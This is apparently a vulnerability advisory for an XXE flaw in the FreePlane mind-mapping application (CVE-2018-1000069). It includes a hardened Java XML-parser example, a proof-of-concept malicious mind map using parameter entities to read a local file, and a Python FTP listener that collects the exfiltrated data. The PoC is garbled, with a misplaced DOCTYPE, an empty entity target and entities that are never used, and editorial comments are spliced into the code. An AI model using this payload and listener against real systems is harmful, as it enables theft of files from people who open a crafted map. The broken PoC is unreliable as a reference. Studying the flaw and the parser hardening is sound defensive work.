What is FreePlane? FreePlane is an open-source application for creating mind maps.


Vulnerability description: FreePlane is a Java-based application that loads its mind maps from plain XML files. The XML parser was allowed to expand external entities (XXE), which is the cause of this vulnerability.

Results: When the victim opens a maliciously crafted mind map, any file readable by the Java process can be sent to the attacker.
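The fix for this class of bug is a parser that never resolves a DTD or an external entity. The following is an added illustration of such a hardened JAXP configuration, not FreePlane's own loader; the class name, the sample maps and the placeholder file path are constructed for the example.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;

public class SafeMindMapLoader {

    // Build a parser that refuses DTDs and never fetches external entities.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // A mind map needs no DTD at all, so reject any <!DOCTYPE ...> outright.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, in case a DOCTYPE ever has to be allowed again.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder();
    }

    // Returns true when the map parsed, false when the hardened parser rejected it.
    static boolean tryLoad(String xml) throws Exception {
        try {
            Document doc = hardenedBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getDocumentElement() != null;
        } catch (SAXParseException e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples: a benign map, and one carrying a DOCTYPE with a
        // parameter entity that points at a (placeholder) local file.
        String benign = "<map version=\"freeplane 1.5.9\"><node TEXT=\"Test\"/></map>";
        String hostile = "<!DOCTYPE map [<!ENTITY % data SYSTEM \"file:///path/secret_file.txt\">]>"
                       + "<map version=\"freeplane 1.5.9\"><node TEXT=\"Test\"/></map>";
        System.out.println("benign loaded:  " + tryLoad(benign));
        System.out.println("hostile loaded: " + tryLoad(hostile));
    }
}
```

With disallow-doctype-decl enabled the hostile sample fails at the DOCTYPE itself, before any entity is declared or resolved, so the file reference is never touched.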

Proof of concept: Malicious mind map:

<map version="freeplane 1.5.9">
<!DOCTYPE node [
<!ENTITY % start "<![CDATA[">
<!ENTITY % data SYSTEM "file:////path/secret_file.txt">
<!ENTITY % end "]]>">
<!ENTITY % all "%start;%data;%end;">
<!ENTITY % c "<!ENTITY send SYSTEM ';'>">
<!--To view this file, download free mind mapping software Freeplane from http://freeplane.sourceforge.net -->
<node TEXT="FreePlane PWNED" FOLDED="false" ID="ID_1702614147" CREATED="1488125426040" MODIFIED="1488125446531" STYLE="oval">
<node TEXT="Test" ID="ID_190033427" CREATED="1488125470150" MODIFIED="1488125471280"/>
<node TEXT="Test" ID="ID_935990512" CREATED="1488125471478" MODIFIED="1488125473816"/>

Simple FTP server:

from __future__ import print_function
import socket

# Placeholder bind address and port (assumption: the page does not give them).
HOST, PORT = '0.0.0.0', 2121

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))   # bind() and listen() were missing; accept() fails without them
s.listen(1)
print('XXE-FTP listening')
conn, addr = s.accept()
conn.sendall('220 Staal XXE-FTP\r\n'.encode())
stop = False
while not stop:
    # Decode the bytes so the command checks below also work on Python 3,
    # where str(bytes) would yield "b'...'" and the ==0 tests would never match.
    dp = conn.recv(1024).decode('utf-8', 'replace')
    if not dp:
        break  # client closed the connection
    if dp.find("USER") > -1:
        conn.sendall("331 password please - version check\r\n".encode())
        conn.sendall("230 more data please!\r\n".encode())
    if dp.find("RETR") == 0 or dp.find("QUIT") == 0:
        stop = True
    if dp.find("CWD") > -1:
        # print the path segments the client sends via CWD, one per command
        print(dp.replace('CWD ', '/', 1).replace('\r\n', ''), end='')
    if dp.find("RETR") > -1:
        print(dp.replace("RETR", '\033[92m[*] RECEIVED DATA\033[0m\r\n', 1))
conn.close()
s.close()



Fixed: CVE-2018-1000069 (Freeplane)